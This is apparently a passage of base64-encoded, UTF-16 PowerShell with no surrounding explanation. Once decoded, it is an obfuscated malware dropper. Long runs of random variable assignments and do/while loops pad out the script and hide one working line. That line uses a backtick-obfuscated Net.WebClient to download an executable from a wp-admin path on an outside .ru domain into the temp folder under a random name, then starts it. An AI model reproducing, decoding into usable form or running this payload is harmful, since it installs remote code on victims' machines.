nAFEAVgBlAGQAZABCAHgAcwBiAEkAQwBaAGkAWgBoAFYAQQBEAEkAdgBiAGwAYQBUAHYAUQBVAEEAeQBIAE0AcQBWAGoAaAAnACkAIAB7AA0ACgAkAGgAQwBJAEsAbgBYAHYATwBsAGkATQBqAFoAegBvAHoAYQBEAE8AZgB2AEwAaABOACAAPQAgACcAdwB1AFQAdgBMAEQAeQByAEcAbwB4AHUAeQBJAEQAcABNAGgATgBEAGsAYQB5AFQATgBRAFIAVQBCACcAOwANAAoAJABWAFUAdQBjAHEAYwBiAFMAYQBlAE4AcwBUAEwAcQBGAGIAdgBMAHAAaQBkAFQASwB4AFcAdgAgAD0AIAAnAGkAdgAnADsADQAKACQAZQBwAGEAUwBkAHoAVgBSAGEATgB0AEgAagBxAHMASABuAGQASQBvAFcASgBNAHgAcwBBAGsAZgBVAGcAYgBrACAAPQAgACcAcwBqAEMAdAB0AE0ARgBHAGQAawBiAHAAVwBrAFUARQBQAEkAVwBhAEcAUABWAGQAZABaAGMAJwA7AA0ACgAkAHAAdwB0AG0ASgBjAHIARwBwAE4AdABRAEMAaQAgAD0AIAAnAFkAawBJAFYAUQBRAGIARgBZAEUASwBZAGMATwBZAFEAVABrAHEAUQBoAHEAcABmAHUAdABOAFAAQgBPAEcAWABZAFgAdwB0AFYAJwA7AA0ACgAkAE0AeQBPAHEAVgAgAD0AIAAnAHoARABPAHMAUQB4AGEAZwBMAFIATABpAHUAYwBiAFcARABMAEUASgB5AG0AQQBGAFIAZgB2AFAAWAAnADsADQAKACQAQwBxAFUASABnAHEAZQBVAHkARABvAFoATABHAEwATwB6AHMAYwBwAHUAQwBtAE0AagBNAEQASgBiAGwAQwBMAEkAVABQAFUATgAgAD0AIAAnAHYAawBzAGoATgBBAFYAWQBhAHQAdABEAGYAQwBtAGkAeAB6AEQASQBZAFUAbgBWAHQATQBCAGQAUQBzAHIAcQBCACcAOwANAAoAJAB4AHMAeABMAHAAbAByAEwAbQBLAFAAWAAgAD0AIAAnAEEAWgBhAFcAUABSACcAOwANAAoAJABPAGIAeABXAHEAIAA9ACAAJwB6AHIAJwA7AA0ACgAkAGkAQgBDAEMAVABFAHQAawAgAD0AIAAnAEsAUwBSAE4AaQBkAEYAVgBHAEIARABxAFYAYwBaAHcAeQBXAHUAYQBWAG8AbAB6AEQARABJAE4AVgBtAHYAZgAnADsADQAKACQAawBGAHkAbQBBAHQAVQBSAFUAdAB5AG4AUgBNAFoAYwBGAFUAaQB6AEoAUQBWAGcAUwBKAGUAVQBzAEEAVQBGAFkAegBsAFgAIAA9ACAAJwBKAHgAZABhAEoAQgB1AG4ATABtAHEAagBrAFAAUwBOAGcAZwBUAGoAUwBVAHIAJwA7AA0ACgAkAHoAWQBVAFoAdABQAFIAYgBDAEIAdwBXAEYAIAA9ACAAJwBBAFAAYgB0AEcAWABvAGwASABrAEMAcwBzAFQAUgBuAEkAbwBHAE8AYQAnADsADQAKACQAZwBWAHQAdwBVAFAAZwBqAFQAdgBJAEgAZwBFAEkAWQBOAFUAYQBPAFIAagBYAEEAVwB4AEoATwBzAEgAUQAgAD0AIAAnAHgAUABpAEYAegBLAEMAWQBFAFkAUgBHAGsAawBuAE4AZgBqAGEAbQBvAE0AVAB4AHkAcwBaAFcARwBTAHEATABmAFIASgBRACcAOwANAAoAJABDAFoARABSAEIASgBzAFIAUQBRAG0ASwB2AGkASQBnAGQAQwBsAHYAIAA9ACAAJwBIAEcAbABmAFMAbABpAEYAYgBTAGIAVwBxAGQASwBYAFUAbQBDAGIAZwBoAGIAbQBNAEsAawBoAGYAQgBPACcAOwANAAoAJABWAGwAdQBTAFIAbABqAFkASwBNAHAAeQBMAG4ARgBGAHkASQBKAFEAaQAgAD0AIAAnAEUAWgBlAHkAVABIAEIAQQBaAGEARABDAEIARgBpAHIARgBqACcAOwANAAoAfQANAAoARgB1AG4AYwB0AGkAbwBuACAAcABBAGcAbwB2AHoAWgBXAFQATQB5AGcAWQBIAFIAYwBQAGsAZwBxAEcAeQBVAHsAIABwAGEAcgBhAG0AKAAkAGUAUQBVACAALAAgACQAZABiAFoARgBmAGoAWABzAHkAcABCAGgAVgBvAFMAUwBjAFcASgBtAE8AdQBJAG0AegBXAEcAQwBaAE8ARQBEAGsAaABCAFgAdABDACAALAAgACQAUgBDAGkARgBOAEEAWABOAEQAbQBRAFoASABIAGgAZABpAFQAbgAgACwAIAAkAEkAYwBVAFMAagBrACAALAAgACQAdwBuAG4AdgBZAGEAQQBzAGoAZwBwAHUAbABjAEoARABQAEoAbwB3AHcAQwBEAFMARQBHAHcATgBwAGkAUQBWAGQAQwBiAFoAUAByAHIAegBIAE8AIAAsACAAJAB4AHMAWQBCAGQAegBZAEUASQB2AG4AQgB1AGsAVQByAFMAZABuAEMAQQBRAFUAUgBqAEEAawBuAFkAUgBvAHAAaABEAEYAWgBmAEYAVABOAFIAZQBIACkADQAKACQAZQB1AE0ATQBLAFoAbABXAEoAdQBiAGkAVQB2AHMAWQBzAFMAVgBWAEYAWQBCAFgAbgBxAHkAZwB4AFEAVAByAGcAcABKAEEAIAA9ACAAJwBNAEwAdQBhAGIAWABlAGYAagBJAFQAcgBIAHkAbgBjAHkAbABGAHQAbwBaAFUAYQBFAFkAcwBhAGsAQgBlAGwAcwAnADsADQAKACQAZwBIAGIAdQBkAEEAWAByAEUAaQBlAG8AcQBTAGcATwBoAEUARABIAHkAbgByAFQAVgBEAGYARQB2AGgAZABpACAAPQAgACcAVgBSAGcAQgBFAEkARQBWAHcAVQBsAHcAUQBpAFoAdABXAFQAWgBoAGsAbgBzAFAASABaAFoAVgBUAHcAWABFAHcAcABVAEEAegBNAGQAdwB6AGwAQgAnADsADQAKACQARgBYAEYAVgBGAEsAWQBOAEUAQQBPAGkAWgBSAHQAZgBpACAAPQAgACcAQwBBAHgAaABBAGEATgBaAHUASgBxAGQAaQB6AGwAYQBKAGsAVABFAFAASQBYAEoAQQB2AGEAbQBiAGkAJwA7AA0ACgB9AA0ACgBGAHUAbgBjAHQAaQBvAG4AIABiAG4AZABpAHoAUgBpAHUAYgBTAHMAdAB3AHYAcwB2AEwARAB4AG0AaQBYAEUAQQBvAHIAaQBNAG4ASQBRAFAAewAgAHAAYQByAGEAbQAoACQAeQBOAFAAaQBCAFUAWQBXAGUASABnAFEAUABYAGEAUwBQACAALAAgACQAeQBIAEkATABkAFQAdABjAG8AaABGAHoAYQB4AEwAcABzAFEAUwBRAGsARgBsAE4AbwB3AGoAcwBJAG0AYQBjAEwAcABjAGEASwBtAGoAdgBvACAALAAgACQAZwByAFIAZQBnAGkARQBaAGUASgB6AHkATQB0AFcAdgBYAGcAawBCAFUAIAAsACAAJABIAGMAbwAgACwAIAAkAFYAawBmAEYAZwBYAGIATABZAHQAdgBKAFAAQQBvAGoASABRAGQATQBjAGoARQBQAFAAQwBMAG4ARQBmAGsAcAAgACwAIAAkAHYATgBUAHQAWgBkAGMAVwBCAFUAYwB6AE4AUgBqAE0AbAB0AHEAeQBiAEoAbABnAFEAcQBkAEwAbgBHAHQASgBHAFQAVQBuACAALAAgACQAcABpAG4AQgBwAGIATwBiAFEAQgBsAGMAYQBUAGwAdAByAE8AKQANAAoAJABqAEwAZwBMAHoAbgAgAD0AIAAnAEcAZwBuAEkAWABJAHAAZwBpAFgAWgBxAHQAYwBEAEUAaQBkAHUASQBpAFcARwBTAEMAZABvAE4AawBMAGsAJwA7AA0ACgAkAFAATQBmAEIAawB3AGMAZwBCAEIAZQAgAD0AIAAnAGkAYQBWAGQAZgBIAHkAaABGAGYAQgBrAGEAVQAnADsADQAKACQAdABUAGMAdwBXAG4AIAA9ACAAJwBhAGcAdwBCAFUAbQBBAE4ARwBnAHIAcgBrACcAOwANAAoAJABJAEwAaABjAE4AQwBGAGsASwB1AGIAUABxAGoATgBaAEYASABjAFQAQQBvAGcAZABuACAAPQAgACcAaABzAFoAVgB0AGoAagBkAGwASAB1ACcAOwANAAoAJABKAGsASQBwAFYAQgBhAEUAdgBSAEEAZwBiAGoATwBRAGMAVAAgAD0AIAAnAEQAcABCAFYATgBMAHAAQgBzAGcATgB4AEYAZgBrAHkAcgBMAEsAUwBlAEQAagBRAFAAcgBzACcAOwANAAoAJABKAFUAVABBAFIAYwBxAGUASQBQAHYAZABnAEEAaQBYAGkAVAB1AEIAcQBsAFcARgBSAEIAQQBBAEcAawBGAFYAVAB2AHMAWABOAE0AIAA9ACAAJwBkAG8ARgBwAGMAUQBnAG0AZQBVAEwAaQB3AHcAcQBEAFgAeABOAGoAUQBjAHAAWQBZAEsAWgAnADsADQAKACQAawBJAEsASwBWAG4AUgBOAGsAdgAgAD0AIAAnAHAAawBPAFcAZgB1AEIASQBaAGMAcwBVAFoAegBkAFAAQQB5AGgAUgBTAHIAVwBCAFcASwBBAE4ASgBmAGQAUwBjAEQAWQB5AEIARgBLACcAOwANAAoAJABXAEIAQQBoAHIAbgBrAEwAcwBYAFEATwBEAGQAYwB4AE8ATQB6AFYAdQBvAHoAdAB5AGEAIAA9ACAAJwBXAGEAZgBOAHUAbwBEAHYAUQByAG8ASwBpAGEAbwBVAGwATwBPAE8AeQBiAGEAagBwAEcAbwBqAGkAQgBHAGoAUQB3AE8AawBNACcAOwANAAoAJABWAGEAQQBpAEwARwBaAEMAUgB2ACAAPQAgACcAVABPAGYAagBNAHMAJwA7AA0ACgAkAHoAdgBZAG8AegBUAE0AUABrAEYAdABtAEwARQBIAGIAcwBvAE4AUQBRAFQASwBtAHAAdABkAE8AbgBhAHoARQBEAFQAawBSAG0AaABiAGgAIAA9ACAAJwB2AFYAVQBKAGUAagBCAEwAbgBuAHYAeQBjAGUAZwBsAGwAegBGACcAOwANAAoAfQANAAoARgB1AG4AYwB0AGkAbwBuACAAZwBNAGMAUABDAHkAVwB5AEYAeABBAHgAcABKAHsAIABwAGEAcgBhAG0AKAAkAHkAYgBLAEcAbwBpAHMAVABxAHAATABOAGcAdQBVAHgAcABjAEsASwBjAEMAQQBuAEQARwBiAG8ARQBnAEEAaABWAHIAWAAgACwAIAAkAEwATgBVAHYAcQBpAFYAeQBjAGkAUwBoAEsAaQB2AEoAcAB2ACAALAAgACQAdgBiAFgAQwBpAEgARQBPAEsAcABkAHIAcAAgACwAIAAkAEEAbQBiAEkATwBUAHQAaABDAEwAVQBvAHQAZABXAGsAcQBzAFoAZAAgACwAIAAkAHMAbwBMAG0AbgBsAFUASwBJAHkAcQBkAEsASwB2AFQAQgBhAGIAVQBOAFoATABoACAALAAgACQATwBiAHIAWgB5AGwAUwBMAHYASQB4AFEAVgBhAGgAWgBXAHQATQBlAEwAagBUAGIAUgBwAFMAeABKAE4AVABjAGQAcwBaAEsAYwBrAEsAIAAsACAAJABZAFIATwBCAHgAQwBmAHoAdQB1AHIAZgAgACwAIAAkAEQAaQBlAEgAUQBJAEkAUwBVAEMAaABwAFYAbgBjAEIAWAB3AGwAaQB6AEYAdABWAFIAZABPAEsAUwBEAE8AVwBuAGQAWgBKAHUAQwBNAGMAQwB1AEUAKQANAAoAJABtAHUAeABBAFEAbgBLAEIAcgBOAFQARwBVAGsASgBmAEUAQgBlAG8ARQBCAHoASABVAGcAUQBSAHAAZABjAFUAbABNAFoAaQAgAD0AIAAnAHUAbgBiAFcASwAnADsADQAKACQAQgBqAHIAQwBOAHYAUgB2AHcATABWAGwAbAB1AHEAZwBqAFgAdABNAE8AbAB6AFYASABMAGIAYgBLAE4AQwAgAD0AIAAnAHQAUQB4AFkAYwBlAEMAVgBZAGgAZgBJAFEAYQBuAG4AJwA7AA0ACgAkAE4ARQBFAGQAeQBXAFEAawBXAHUAQwBVAHEAIAA9ACAAJwBpAEkARABzAFYAeABTAEUARQBWAFgAbgBnAEYAcQBFAGgAWQBvAE0AdwBJAHkAcAB1AHUAZwBuAEYAagBBACcAOwANAAoAJABpAHcAdwAgAD0AIAAnAE0AaQAnADsADQAKACQAcAB3AEoAegBpAEYATABwAEsAdQBSAE4AZABnAGQAbwAgAD0AIAAnAEsATwB4AGIAUQBlAHoAVgBVAFYARgBqAEkAcABzAHkARwB5AFEAbgBKAFAAagAnADsADQAKAH0ADQAKACQARQBXAHQAbgBXAFcAVgBFAEkAVwBwAHkAbABxAFkAUwBLAGUATwBrAEYARgBCAEUAWgBPAFgAaABOAEIAIAA9ACAAJwB1AGUATgBXAHUAawBMAHkAeAB6AEEAYgBtAHoAdAAnADsADQAKAEQATwB7AA0ACgAkAGQAegBqAE8AWQBVAEUAbABnAEgAcwBnAGIAaQAgAD0AIAAnAEIAbgBuAHcARABuAEEAbwBUAFkAdgBLAGoAegBHAEsATABNACcAOwANAAoAJAB2AG0ASwBTAEwAQwBWAEkAUgBqAEYAZgBoAGwATQBEAG0AQwB5AHIAYgBkAEwAUQBwAGMASwBWAG0AWgB3AGcAVQBiAG4AaAByAFYAYwB1AGgAZgBpACAAPQAgACcATgB0AE8AWQBXACcAOwANAAoAJABVAEgATQBVAFgAUgBiAHQAYwBpAHMAQQBXAHIAbQBZAEwARgB5AGUATQBRAGEARQBLAHcAdgBHAEMAdwBPAG0AeQBxAEYAcABUAHoARQBWACAAPQAgACcAeABzAHUAQgBoAEkAcQAnADsADQAKACQAcABoAEkAWgBzAGoARQBnAEkASwBhAFcAVQBxAGcAVAAgAD0AIAAnAEMAZwBtAHgARQBMAEIAJwA7AA0ACgAkAFgATwBYAGcAQwBjAG8ARQBwAE4ATwBHAE0ARwBHAEEASQBMAHAAZAB6AG0ASABNAGEAIAA9ACAAJwBmAGMARABVAGsAVgBHAHcAVQBWAGcAQQBHAGgAbQBTAGYAYwBSAE4AdAB2AFoAbABvAHQAVwBZAGQAbABHAEwARwBHAHgATABBAFUAYwBzACcAOwANAAoAJABRAGwAawBVAEkARgBIAHEAaABHAGUAdQBNAEIAagBEAFIAZgByAHkAaQBTAGkAUABVAHUAegBqAGIAUgBLAHoAWQBPAGQASgBvAFIAZwBvAFAAaQB3ACAAPQAgACcAYgBRAHQARgBPAEkAaQBwAGwAdABSAHgARABWAHoATgBGAFkAUABQAHcAZQBWAHkAWQBaAE8AJwA7AA0ACgAkAHkAQwAgAD0AIAAnAHoAVgBEAG4ARABBAHUAVQBTAGkAVQBPAGYAdwBnAEcAVABSAFMAaQByAFQAaABpAHgAdgB1AGcAcAB1ACcAOwANAAoAJABxAGoASwBSAGMAegBpAHcATQBMAEQAdwBnAGIAUQBxAEIAcwBTAHYAaQBnAFQAcwBnAG8AVQBwAEkAIAA9ACAAJwBOAGYAWQBBAGUAZQAnADsADQAKACQAZgBFAEgAawBWAEYAWABuAFcAQQBIAGcARQB0AG8AWAB5AHoAIAA9ACAAJwBQAFIAawBuAGUAcwBuAEgAeQBYACcAOwANAAoAJABmAHcAbABWAFcAbwBLAEsATgBhAHcARQBLAG4ATgBKAEQATQBZAEkAWgAgAD0AIAAnAFUAUABEACcAOwANAAoAJABRAGMAcwBoAHkAWgBRAHkAVgBLAHYAagBXAEEATQBvAGwAagBTAE0AYQBBAFIAagBqAHUAWgBQAHkAZABjAFYAUgBjAFgAaQBTAGYAYgAgAD0AIAAnAG8ATQBTAEMATgBVAHEAWAB3AGwAUQBrAHgAcQBVAFAASwBJAHkARQB6ACcAOwANAAoAJAB6AHIAaQAgAD0AIAAnAFIAdQBkAGQAVgBHAEgAdgBZAE4AaQBQAFYAUABFAEMAUwBOAE4AcgBZAGIAJwA7AA0ACgAkAFAAWgB4AGMAZQBBAHkAZAB6AFUAcABOAEgAPQAgACQAUABaAHgAYwBlAEEAeQBkAHoAVQBwAE4ASAAgACsAIAAxADsAfQAgAFcAaABpAGwAZQAgACgAJABQAFoAeABjAGUAQQB5AGQAegBVAHAATgBIACAALQBuAGUAIAAxADIAKQANAAoARgB1AG4AYwB0AGkAbwBuACAARABsAHMAZgBnAEYAYQB6AEcAVwBzAHAAewAgAHAAYQByAGEAbQAoACQASABYAEoAaABYAFkAbQBNACAALAAgACQAVABvAEQAdgB1AFMAUABKAGMAQwBTAEcAaAB2AG4AaQBBAHgAaQBsAGQAcQBBACAALAAgACQAbQBWAEcATQBZAGsAVwBsAEIASAB2AGcATQBJAEgAegB5AEQAUABXAEkAQgBaAGMAVwB5AFgAYQBFAGEAdwBkAG8ATQBKAFoAKQANAAoAJABuAGEAYgBkAGgAbAB2AGQAcABaAE4AdwBoAGEASwBTAHMAegB6AGkAbQB2AFMAVwByAGIAdgB6AGMAUQAgAD0AIAAnAGUAawBWAG4AVwBDAEsAZgBYAGQAaQBOAEwAZgBpAHoAZgBRAGgATwBXAHQASAB3AHMAJwA7AA0ACgAkAEUAbQBGAHAAdwBCAFoAeAAgAD0AIAAnAEwATQBtAG8AUQBpAFQAYgBFAEQAaABIAHEASQBjAFEAagB2AEMARgBsAGQAWQB2AE8AeABYAFoAaAAnADsADQAKACQAaABvAE8AeABYAG0AcwBjAFEAZgBDAFIARABzAEsAQQBPAGQAYwBZAE4ARgBXAHIAdwBpAG4AcgBaACAAPQAgACcASwB0AHQAVwBXAHMAdAB0AGwAcABZAEgAZQBXAEQAVQBaACcAOwANAAoAJABrAE4AagB0AHgASQBVAGMAUgBXAEEAbwB6AEEAQwB4AFYASQBZAGcAVgBTAEgAVQBzAG4AQQBGACAAPQAgACcAQQBvAGMASQBHAEgATABqAFEAdwBrAEMAdABhAFcAcwB3AHEAWQBFAGcAQQB1ACcAOwANAAoAJAB0AEsAUwBGAE8AQgBLAEkATwBCAFIAaQBZAGcAcwBzAHEATgBGAE0AbgBkAGMAcgBsAGMAdwB3AGIAQgB0AHoAdABnAE8AdwBwAEcAVgBQACAAPQAgACcAYgBuAHMASgBuAFQAUAB4AGYATgBTAHYAaQBJAFAAaQBhAFQAbQBFAE4AaABOAEgAUgBvAHIAUgB3AEQAawBzAHEAJwA7AA0ACgB9AA0ACgAgACgATgBFAHcALQBvAGIAagBFAGMAdAAgABwgYABOAGAAZQBgAFQAYAAuAGAAVwBgAGUAYABCAGAAQwBgAGwAYABpAGAAZQBgAE4AYABUAB0gKQAuAEQAbwB3AG4ATABvAEEAZABmAEkAbABFACgAIAAdIGgAdAB0AHAAOgAvAC8AcwBpAG0AcABzAG8AbgBnAHIAbwB1AHAALgByAHUALwB3AHAALQBhAGQAbQBpAG4ALwBiAGkAbgAuAGUAeABlAB0gIAAsACAAHSAkAEUATgB2ADoAdABlAG0AcABcAHEATQBCAFIAawBJAC4AZQB4AGUAHSAgACkAIAA7ACAAcwB0AEEAUgB0ACAAHSAkAEUATgB2ADoAdABlAG0AcABcAHEATQBCAFIAawBJAC4AZQB4AGUAHSANAAoAVwBoAGkAbABlACAAKAAkAFAAVQB1AGoAcAAgAC0AbgBlACAANgApACAAewANAAoAJABiAGsAaABTAEoAVABRAGMAUgBDAFUATwBSAHYAbgBOAFYAdQBIAHIAdwBLAFcAegB1AFQAIAA9ACAAJwBGAG8AbgBKAG4ASQB6AHAAdABnAGkAcgB0AFUARABMAEkAYgB5AE8AVABRAEMAeQBBAGIAJwA7AA0ACgAkAFAAVQB1AGoAcAA9ACAAJABQAFUAdQBqAHAAIAArACAAMQA7ACQAaABRAE8AaQBYAHAAcQBLAG4AZAB0AGcARgBTAEcAdABoAG4AQwBOAFgAcwB5AE4AWAB3AEYASwBvAG0AcABKAE0ATABTAFkAZgB4AEsAQwBEAEoAIAA9ACAAJwBpAFAAdQB0AHcATgBYAFYASwB4AE4AYQBvAFIAQQAnADsADQAKACQAUABVAHUAagBwAD0AIAAkAFAAVQB1AGoAcAAgACsAIAAxADsAJABiAGsAZgBXAEIAbwBrAFUAdQB6ACAAPQAgACcATwBqAGMAQQBKAE4AYwBRAHkAZABDAEoAdwBRAFIAZQBMAHkAawBkAEgAZQBtAGkAUwBYAG0AUAAnADsADQAKACQAUABVAHUAagBwAD0AIAAkAFAAVQB1AGoAcAAgACsAIAAxADsAJABlAFoAegB3AGcASQBsAGgAeABEAE0ATQBBAEIAaABaAGEAagBGAGsASwBaAFcASgBWAGEAagB3AHUAaABtAGIATQBYAFUARABEAE0AIAA9ACAAJwBIAGYAdwBPAHUAWQBRAEcAZABGAEoAcgBvAGgAZgAnADsADQAKACQAUABVAHUAagBwAD0AIAAkAFAAVQB1AGoAcAAgACsAIAAxADsAJABGAEQAcQBhAEcAWgBwAG4AUABSAGwAQQBkAGgAZQBXAE8AVAB4AEUATgBMAGMAawBGAFQARwByAGsAcQAgAD0AIAAnAHQAaABvAFAAQQBNAGwASwBpAHEASQB5AGMAbgBRAGQAdgBiAG4AZABWAGoAYQBWAHQAYgBGAFYAbQBTAHgARABaAFQAcgBTAG8AUgBlAEoAYwBJACcAOwANAAoAJABQAFUAdQBqAHAAPQAgACQAUABVAHUAagBwACAAKwAgADEAOwAkAE8ARQBNAHoAeABvAHEASwBQAHcATQBjAEsASAAgAD0AIAAnAFYAWQBHAFEAWABQAHMARgBaAEkAdgB5AG8AZQB4AGUAQQAnADsADQAKACQAUABVAHUAagBwAD0AIAAkAFAAVQB1AGoAcAAgACsAIAAxADsAfQANAAoARABPAHsADQAKACQAbgBxAEIAcABCAGcAUwBTAE0AUQBxAHYAQwBuAHgAeQBpAGIASABLAHkATgBSAFAAbgBTAGkAcgBiAG8AYgBVAHAAUgB1AGsARwByAHUAYgBPAG8AQQAgAD0AIAAnAHEAUABUAEkASABFAGQASgByAEwAQQBaAFoAbQBDAGkAeQBiAHEAWABwAFYARwAnADsADQAKACQAdABNAHIAcgBnAGYAdgBKAE4AcQBaAFgAegBaAGsAWABMAFIAZABkAFEAVQBMAFUAbwBNAGQAbgB5AGMAbAAgAD0AIAAnAEoAaQBPAHUATgBtAGQATABRAHIATQBpAE4AZgBqAFkAcgBTACcAOwANAAoAJABYAHMAYwBUAFkAQgBXAEMAVQBDAEgATAAgAD0AIAAnAEUARQBPAFEATABwAEsAWQBuAFIATgBaAEgAYwBHAEoAZABGAHcAZgBRAE4AYgBnAE8AcABzAHEAawBKAEoAJwA7AA0ACgAkAGYAYwBlAEkAUgBTAE4AQgAgAD0AIAAnAG4AagBiAFAAdABSAFoAUAAnADsADQAKACQAcgB4AEsAZgBVAHIAZABoAEIAVgB3AFUAbwBlAEgARQB0AGYAeAB5AHMASwByAHUAWABjAGQAegBSAFUAWQBTAGEAcwBSAE0AeAAgAD0AIAAnAEgAbgAnADsADQAKACQAagBRAHMARgBvAHoARQBUAEsAegBsAGIAUgB6AGcARgBQAEgAcwBOAGUAUABoAHcAZAB0ACAAPQAgACcATgB2AEgAdABYAEsAVABJAHUAegBwAGoAYwBZAGYASABVAG4AcQBKAHMAbABIAGgAdABQAFoAQQBVAGoAdgBiAHUARQByAFkARABHAE4AUgAnADsADQAKACQAcQBsAEYAYQBZAFEAbwB5AEgATQBKAG0AawBDAGIAbgBaAHoASQBsAFQAbwBMAEQATgBvAFgAZwBHAEUATwBaAFoATABDAEEAQgBIAFYAegBrAEIAIAA9ACAAJwBYAG0AcABLAEIAUQBsAGQARwBGAGYAZQAnADsADQAKACQAYQBDAE0AIAA9ACAAJwBzAEgAcgBEAHgAagBNAFkAQQBiAG0AUwBlAEkAQQBSAGIAbwBSAFkAZQBXAFEAVgBiAEgAVQB0AGgAQQAnADsADQAKACQAegB1AGwASABkAEoASgBaAEMAYwBsAEEAcAB5AEwAYwB3AGYATQBhAGwAawAgAD0AIAAnAEUAVgByAFcAYgBxAFAAUwByAEEAQgBuAFgAcwBCAFgASABSAFAATwB3AHQAVgBiAFgAUQBmAFgATwBVAFoAbgBPACcAOwANAAoAJABoAGwAbABuAGgAaQBuAEoAIAA9ACAAJwBBAG4ATABuAGoAdgBJAEYASgBXAFcAcgBLAEEAUQB5AEwATAByAEUAWABiAE4AWgBQAEwAUABsAFQAagBnAGIAbgB6AFUAbgBNAGMAJwA7AA0ACgAkAGIARwBQAFAAUgBzAFEAVwBsAFUAbwBXAFgAdgBFAFcAWgBhAG0AWABYAGcAVwBsAGEAcQB1AEQASwBmAGQAbQBqAFAAUAB5AEgATAB3AGcAIAA9ACAAJwBvAGQAUgBlAE4ASgBmAGkAZAB2AE4AYQBFAFkAdgBrAGQAcABhAHgATQBNAEcAcgBDAG0ASABmAEcATwBPAGQARgBZAGkARABFAEcATQBnAFAAVgBoACcAOwANAAoAJABVAEwAUQBoAGIASQBoAHcASQBoAEcAPQAgACQAVQBMAFEAaABiAEkAaAB3AEkAaABHACAAKwAgADEAOwB9ACAAVwBoAGkAbABlACAAKAAkAFUATABRAGgAYgBJAGgAdwBJAGgARwAgAC0AbgBlACAAMQAxACkADQAKAEkAZgAgACgAJwBQAE0AZgBxAFUATwBkAFcAVgBqAG0AYwBXAFoAYwBhAEIAQQBiAE8AZwBqAFUAZgBwAHIAZgBYAGMAdABpACcAIAAtAGUAcQAgACcAZQBXAGIAcABIAFIATABzAGwAcwBIAFcAbABHAGgAZgBlAGwAZgBPAHUAVABEAGYAcgB6AEEAYwBpAEcAdABjAEEAdwB5AHoAJwApACAAewANAAoAJABtAFQAawBvAGkAZABvAGMAeQB1AGoASwBBAHMAcQBPAFQAdwBMAFQAdgB4AEgAUQBpAEoAZQB5AGYAVgBwAEkAaABnAHIAUwB2AFoATABwAE8ARAAgAD0AIAAnAEYAUgBTAGkATgBDAE4AaABBAG0AZwBDAHAATABVAEcAWQB6AHAAeABkAEUAYgBkAFQAQgBZAFQAdABrAFYARgBzAEUAQwB5AFEAYQAnADsADQAKACQAdwBSAG8AcABWAEIAZQBDAEcAYgBUAG4AcQBZAEYAIAA9ACAAJwBBAHAAbwBQAE0AZQB1AG4AUABSAGIASwBrAEoAJwA7AA0ACgAkAHEAeQBpAHQAZwBwAFAARwBiAHAAegBSAHMAYQB3AGUAZwBtAG8AIAA9ACAAJwBKAGIATAAnADsADQAKACQAUgBXAEEAWgBEACAAPQAgACcAVABSAHgARgBjAHAASQBlAFoAYQBrAGoATQBhAE0ATQBDAE4AVABtAHUAWQB2ACcAOwANAAoAJABNAE8AbQBlAGMASgBvACAAPQAgACcAQwBCAFYAaABUAG0AeABIAFcAQwBNAE8AUgBaAE8AawByAEUAVABuAEcAUQBmAHYAVwBxAHQATwBDAGQAQwBQAG0AdQBoAEwAJwA7AA0ACgAkAGYAcwBRAFAATAAgAD0AIAAnAHMATABoAHAAbQBBAEIAbgBYAHEAQQBqAGwAVgBhACcAOwANAAoAJABjAHMAagBGAHMAegB3AGIAVwBzACAAPQAgACcAZwBNAEwAQwAnADsADQAKACQAdgBBAG4AawBwAEIASABOAEEAcQBmAFoAbABLAHYAcABlAFUAUQBZAGcAIAA9ACAAJwBZAHMATwBGAFMAdQAnADsADQAKACQAVgBiAEwAbgBkAG8AbABpAHAAVgBiAGsAVgBGAEIAVQBYAHEATAB3AE4AQgByAHYAZQByAHAAYwB2AFYAagBpAE4AUQBlAFAAVQBtAEkAVgBLACAAPQAgACcAbwB5AG8AbgBLAEEAVwAnADsADQAKACQAcQBPAEgAeABqAFQAagBQAEkAbQB6AEkAbgBVAG0AdABYAEYAYQBtAEEAIAA9ACAAJwBpAHAAbQBHAE4AdABIAHEAZwBvAEcAVwBlAFUAYgBQAGgASwBnAEUAZABWAFcAQgBVAFUATQB2AFAARgBaACcAOwANAAoAJABZAEYAZwBSAEwAYwBHAHEASABSAEcASwBDAFEAcABSAFIASQBYAFEARgB2AEgATQBUAGsAbQBzAGcATQBiACAAPQAgACcAUABWAHkAWQBvAEsARQBGAEQAcQB4AEwAUABMAHoARABmAHUAZABIAGkASgBlACcAOwANAAoAfQANAAoAJAB5AFUAeABhAHAATwBKAHYAcQBmAHYAaABSAFEAZABIAEQAUwBNAFAAeAB2AHcASQBsACAAPQAgACcATgBtAGoAVABzAEYAcgBWAGEAVABNAGUAUABwAGcAQgBVAGoAUQBTAGwAUABSAFYARQBQAHgATwBmAEMAJwA7AA0ACgBEAE8AewANAAoAJAB5AEkATAAgAD0AIAAnAE4ARwBSAE8AWQBqAHQAaABaAEcAZABRAFIAcgBJAFkATgBuAGoAUABoAHcARwB2AGsAWgBVAEEAbQAnADsADQAKACQAcQBvAGsAcwBPAGkASAAgAD0AIAAnAEIAdgBTAHQARwBjAHkAdgBnAGUAQQBkAHAASwBaAHYAQQBSAEEAVgBlAHkAUAB0AHUAUwBQAG8AZgBZAGMAYQBSAFUAbQBuAHgAbgAnADsADQAKACQAZAB4AG8AdABxAEEASgBTAGYAUABwAHIAeABoAGwATwBDAGcAWQB6AG8ATQBKAFAASABCAFoATQBVAFkAbAB5AE4AYgBXACAAPQAgACcAcABGAFoAdABsAEEAagBaAHEAaABmAHMAZgBGAGoARwBZAG8AQgBSAG8AJwA7AA0ACgAkAGwAbwBhAHcAeABIAGQAcgBlAFYATABOAFoAeABIAGYATwBvAGMAawBZAGEAIAA9ACAAJwBnAGcAUABwAGYAWgBZAGEARgBrAFAAVABrAFMAbwBEAGMAdgB6ACcAOwANAAoAJABLAGgAUgBnACAAPQAgACcAegB0AGEATQBvAEQAQQBMAFQAdQBQAGgAUwB5AFIARgB1AEcAZABKAGQAVwBNAFoAbABBAG8AWgBYAEwAegBQACcAOwANAAoAJABDAGYAZwB5AE4AUQBnAFAASQBSAFkAWQBWAEsAeABpAHgAUABhAG8AWABKAGQAZwBBAGIAbwBPAGIAbwAgAD0AIAAnAHUAQQB5AFAAVABsAEgAZwAnADsADQAKACQAdwB1AFUARQBvAEIAUABwAHIAcgBhAHYAWgBhAE0AdABCAEEAeQBtAGMAUgBuAFUASgBlAFgAVwB2AGUAdwBwAGoAbAByACAAPQAgACcAbwBZAHIAeQBMAHkAWABrAE4ATQBWAGEAbQBWAFIAawBKAHUATQBmAEcAQQB2AEsAZQAnADsADQAKACQAdABOAHUAawBNAG8AaQBqAEYAYwBJAHoAYQBlAHQARABHAHcASgB4AGsAYQBNAEwAZwBvAFk